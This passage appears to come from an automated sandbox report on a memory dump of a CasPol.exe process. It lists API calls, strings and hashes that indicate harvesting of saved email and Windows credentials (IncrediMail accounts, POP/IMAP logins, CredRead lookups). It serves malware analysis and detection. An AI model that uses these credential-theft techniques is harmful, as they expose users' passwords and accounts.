                                                                                                                                                                                    • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                                    • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                                                                                                                                                    • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                                                                    • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                                                                    • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                                                      • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                                                      • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                                                      • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                                                                    • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1416211542-0
                                                                                                                                                                                    • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                    • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                                                                                                    • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                    • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                    • API String ID: 2360744853-2229823034
                                                                                                                                                                                    • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                                                    • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                    • memset.MSVCRT ref: 00410129
                                                                                                                                                                                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                      • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                                                    • memset.MSVCRT ref: 00410171
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                                                    • API String ID: 912701516-1821301763
                                                                                                                                                                                    • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                                                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                                                    • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                    • memset.MSVCRT ref: 0040301E
                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                    • memset.MSVCRT ref: 0040306B
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403083
                                                                                                                                                                                    • memset.MSVCRT ref: 004030B4
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004030FC
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00403125
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                                    • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                                    • API String ID: 3672803090-3168940695
                                                                                                                                                                                    • Opcode ID: c9eb44310dfb29f03ef0e10aa8539b91ddc0c6df349914104ac0254ae78c74f6
                                                                                                                                                                                    • Instruction ID: c63447841566cf46c771af6046a8c2292ff1b2fb78a85e5f221a3b25c3a6e5c2
                                                                                                                                                                                    • Opcode Fuzzy Hash: c9eb44310dfb29f03ef0e10aa8539b91ddc0c6df349914104ac0254ae78c74f6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C3140B280121CBEDB11EF91CC81EDEBB7CEF14345F0440A6B908A1052E7799F959FA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                    • API String ID: 3540791495-3849865405
                                                                                                                                                                                    • Opcode ID: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
                                                                                                                                                                                    • Instruction ID: 99806e288156f34ba132e8f36af0febe6860c11fee4b77973fd999a480d51a7c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7631B172408385AFD720DF51D841A9BBBE9FB84314F04483FF69492292D779D944CF5A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                                    • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                                    • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                    • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                                    • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                    • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                    • API String ID: 1640410171-2022683286
                                                                                                                                                                                    • Opcode ID: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                                                                                                                                                                                    • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                                                                                    • Opcode Fuzzy Hash: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                    • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                    • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$strlen
                                                                                                                                                                                    • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                    • API String ID: 2619041689-3408036318
                                                                                                                                                                                    • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                    • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$strlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 667451143-3916222277
                                                                                                                                                                                    • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                                                                                    • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                                                                                                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                    • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                    • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                    • String ID: J$Microsoft_WinInet
                                                                                                                                                                                    • API String ID: 3318079752-260894208
                                                                                                                                                                                    • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                                                    • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                    • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                    • API String ID: 2780580303-317687271
APIs
• LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
• FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
• strlen.MSVCRT ref: 00406CCC
• _mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00406CDC
• LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
• _mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 00406CF6
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
• String ID: Unknown Error$netmsg.dll
• API String ID: 2881943006-572158859
APIs
  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
• _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
• _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
• GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
  • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: PrivateProfile_mbscpy$AttributesFileString
• String ID: TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 888011440-2039793938
APIs
Strings
• attached databases must use the same text encoding as main database, xrefs: 0042EAE6
• database %s is already in use, xrefs: 0042E9CE
• out of memory, xrefs: 0042EBEF
• database is already attached, xrefs: 0042EA97
• unable to open database: %s, xrefs: 0042EBD6
• cannot ATTACH database within transaction, xrefs: 0042E966
• too many attached databases - max %d, xrefs: 0042E951
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memcpymemset
• String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
• API String ID: 1297977491-2001300268
APIs
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
  • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
• ??2@YAPAXI@Z.MSVCRT ref: 00409C53
• ??2@YAPAXI@Z.MSVCRT ref: 00409C6F
• memcpy.MSVCRT(?,0wE,00000014), ref: 00409C97
• memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014), ref: 00409CB4
• ??2@YAPAXI@Z.MSVCRT ref: 00409D3D
• ??2@YAPAXI@Z.MSVCRT ref: 00409D47
• ??2@YAPAXI@Z.MSVCRT ref: 00409D7F
  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
• String ID: 0wE$d
• API String ID: 2915808112-1552800882
APIs
  • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
• strchr.MSVCRT ref: 0040327B
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: PrivateProfileStringstrchr
• String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
• API String ID: 1348940319-1729847305
APIs
• memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
• memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
• memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy
• String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
• API String ID: 3510742995-3273207271
APIs
• GetClientRect.USER32(?,?), ref: 00405E80
• GetWindow.USER32(?,00000005), ref: 00405E98
• GetWindow.USER32(00000000), ref: 00405E9B
  • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
  • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
• GetWindow.USER32(00000000,00000002), ref: 00405EA7
• GetDlgItem.USER32(?,000003ED), ref: 00405EBE
• GetDlgItem.USER32(?,00000000), ref: 00405ED0
• GetDlgItem.USER32(?,00000000), ref: 00405EE2
• GetDlgItem.USER32(?,000003ED), ref: 00405EF0
• SetFocus.USER32(00000000), ref: 00405EF3
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2432066023-0
                                                                                                                                                                                    • Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                    • Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                    • Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                    • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                    • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                    • API String ID: 945165440-3589380929
                                                                                                                                                                                    • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                    • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                                                                                    • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                    • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                    • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                                    • API String ID: 3411445237-4169760276
                                                                                                                                                                                    • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                                                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                                                    • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
